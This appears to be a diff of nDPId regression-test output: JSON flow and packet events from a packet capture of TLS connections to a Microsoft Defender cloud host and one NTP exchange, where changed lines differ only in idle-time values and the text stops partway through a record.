+00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1626168079937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168079937,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KdAbvq1sJRAAAAALAC\/\/+BCAAAAgQFtAEDAwYBAQgKPdIB3wAAAAAEAgAA"} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1626168079957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079957,"pkt":"8BiYFWV8WNVuaKQACABFAAA0g1dAAG0GlasocQovwKgBeQG70pxuzvrNjMnfA4AS\/\/\/QkQAAAgQFoAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1626168079957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079957,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KcAbuMyd8Dbs76zlAQEAABUQAA"} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079905,"flow_last_seen":1626168079957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079957,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1626168079986,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168079986,"pkt":"8BiYFWV8WNVuaKQACABFAAA0TOVAAG0GzB0ocQovwKgBeQG70p13uqY86tbCUoAS\/\/\/a2QAAAgQFoAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1626168079986,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168079986,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KdAbvq1sJSd7qmPVAQEAALmQAA"} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168079937,"flow_last_seen":1626168079986,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168079986,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":275,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1626168079905,"flow_last_seen":1626168080007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1626168080007,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168079937,"flow_last_seen":1626168080036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080036,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080092,"flow_last_seen":1626168080092,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080092,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1626168080092,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080092,"pkt":"WNVuaKQA8BiYFWV8CABFAABMx3MAAEARqBTAqAF5Ef02+\/5LAHsAONKdIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080092,"flow_last_seen":1626168080092,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080092,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1626168080122,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080122,"pkt":"8BiYFWV8WNVuaKQACABFAABMV31AADcR4QoR\/Tb7wKgBeQB7\/ksAOLQqJAED6wAAAAAAAAANU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mQLKsA6OSX2ZAsrLL1"} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080539,"flow_last_seen":1626168080539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168080539,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1626168080539,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168080539,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KeAbvRcN5sAAAAALAC\/\/97\/QAAAgQFtAEDAwYBAQgKPdIENAAAAAAEAgAA"} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080569,"flow_last_seen":1626168080569,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168080569,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1626168080569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168080569,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KfAbtYRRqJAAAAALAC\/\/+47QAAAgQFtAEDAwYBAQgKPdIEUgAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1626168080587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168080587,"pkt":"8BiYFWV8WNVuaKQACABFAAA0frdAAG0GmksocQovwKgBeQG70p4gI5AJ0XDebYAS\/\/9F7gAAAgQFoAEDAwgBAQQC"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1626168080587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168080587,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KeAbvRcN5tICOQClAQEAB2rQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080539,"flow_last_seen":1626168080587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080587,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1626168080617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168080617,"pkt":"8BiYFWV8WNVuaKQACABFAAA0hXNAAG0Gk48ocQovwKgBeQG70p8W6XtBWEUaioAS\/\/+g\/gAAAgQFoAEDAwgBAQQC"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1626168080617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168080617,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KfAbtYRRqKFul7QlAQEADRvQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080569,"flow_last_seen":1626168080617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080617,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080539,"flow_last_seen":1626168080639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080639,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} -01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080569,"flow_last_seen":1626168080666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080666,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080539,"flow_last_seen":1626168080539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168080539,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1626168080539,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168080539,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KeAbvRcN5sAAAAALAC\/\/97\/QAAAgQFtAEDAwYBAQgKPdIENAAAAAAEAgAA"} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080569,"flow_last_seen":1626168080569,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168080569,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1626168080569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168080569,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGRffAqAF5KHEKL9KfAbtYRRqJAAAAALAC\/\/+47QAAAgQFtAEDAwYBAQgKPdIEUgAAAAAEAgAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1626168080587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168080587,"pkt":"8BiYFWV8WNVuaKQACABFAAA0frdAAG0GmksocQovwKgBeQG70p4gI5AJ0XDebYAS\/\/9F7gAAAgQFoAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1626168080587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168080587,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KeAbvRcN5tICOQClAQEAB2rQAA"} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080539,"flow_last_seen":1626168080587,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080587,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1626168080617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168080617,"pkt":"8BiYFWV8WNVuaKQACABFAAA0hXNAAG0Gk48ocQovwKgBeQG70p8W6XtBWEUaioAS\/\/+g\/gAAAgQFoAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1626168080617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168080617,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoAABAAEAGRg\/AqAF5KHEKL9KfAbtYRRqKFul7QlAQEADRvQAA"} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168080569,"flow_last_seen":1626168080617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1626168080617,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080539,"flow_last_seen":1626168080639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080639,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, 